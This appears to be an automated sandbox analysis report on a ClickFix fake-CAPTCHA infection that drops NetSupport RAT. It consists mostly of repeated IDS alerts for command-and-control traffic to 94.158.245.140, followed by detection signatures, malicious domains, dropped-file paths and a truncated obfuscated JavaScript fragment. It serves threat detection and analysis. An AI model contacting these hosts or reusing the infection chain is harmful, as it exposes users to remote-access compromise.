2025-06-02T21:41:49.947578+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.047144+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.147315+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.248144+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.348189+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.449171+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.550222+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.651178+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.752141+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.853309+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:50.953354+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.054174+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.155259+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.259665+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.359195+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.459636+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.559491+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.660309+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.759731+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.860286+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:51.963023+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.064277+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.164071+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.262320+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.363167+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.464278+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.565254+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.666372+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.766267+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.867254+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:52.967199+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.068259+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.168270+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.271164+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.372328+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.469264+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.570147+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.673087+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.772980+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.871221+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:53.975014+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.073249+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.173229+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.273196+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.373247+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.474172+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.575195+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.676192+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.777191+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.877178+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:54.978232+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.078427+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.179175+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.279845+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.381001+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.480982+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.582900+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.684992+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.783103+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.883206+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:55.983274+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.083426+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.183476+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.284277+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.384186+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.485188+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.585169+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.686179+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.786184+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.887385+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:56.987203+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.088216+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.189230+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.290168+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.391236+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.491291+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.593004+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.694339+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.793669+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.893609+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:57.994702+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.094309+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.194244+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.294684+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.396277+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.496228+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.596239+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.697403+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.797401+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.897178+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:58.998188+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.098235+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.199275+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.301007+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.399239+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.500979+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.601413+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.705264+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.803058+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:59.905019+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.003208+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.103752+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.205086+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.304193+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.404238+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.504216+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.604290+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.705213+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.805209+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:00.906215+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.007205+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.107429+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.208293+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.311810+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.408272+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.511564+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.609224+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.713287+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.813193+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:01.911650+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.011199+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.112221+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.212202+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.313238+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.414190+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.514189+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.615184+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.715327+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.816189+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:02.916204+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.017194+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.117193+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.218214+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.319490+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.419752+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.523236+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.623501+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.723757+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.824024+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:03.923484+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.023825+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.127335+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.227558+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.324219+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.425388+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.526255+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.626254+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.727218+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.827226+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:04.928250+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.028309+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.129219+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.230317+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.333023+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.431323+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.532043+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.632274+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.735095+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.838042+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:05.936446+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.039561+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.139108+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.239177+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.337237+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.437209+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.537332+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.638240+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.738209+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.839595+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:06.939355+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.040210+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.141203+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.241233+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.345053+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.445178+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.545081+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.645411+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.750669+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.846382+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:07.949059+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.049317+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.149141+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.249252+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.348250+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.448282+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.549247+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:42:08.649238+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe	ReversingLabs: Detection: 16%

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match

File source: 0.6.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.355..script.csv	Joe Sandbox AI: detected suspicious Javascript with a risk score 93.0%.
Source: 0.351..script.csv	Joe Sandbox AI: detected suspicious Javascript with a risk score 86.8%.

HTML page contains obfuscated javascript

Source: https://3dmaine.com/d.js

HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _

Source: https://fountainofhealth.ca/en

HTTP Parser: Base64 decoded: 1748893175.000000

Source: https://fountainofhealth.ca/en	HTTP Parser: No favicon
Source: https://fountainofhealth.ca/en	HTTP Parser: No favicon
Source: https://fountainofhealth.ca/en	HTTP Parser: No favicon

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

File opened: C:\Users\user\AppData\Roaming\Dire\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.168.117.169:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49783 version: TLS 1.2

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: PCICL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: pcicapi.dll.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.31.dr
Source:	Binary string: F:\project\delphi\itop\ipv6chek\Release\DllForIpv6.pdb source: pnf1.dll1.31.dr, pnf1.dll0.31.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2062661 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com) : 192.168.2.16:51757 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2062663 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (3dmaine .com) : 192.168.2.16:49722 -> 107.180.51.102:443
Source: Network traffic	Suricata IDS: 2062661 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com) : 192.168.2.16:61172 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49773 -> 94.158.245.140:443
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.16:49773 -> 94.158.245.140:443

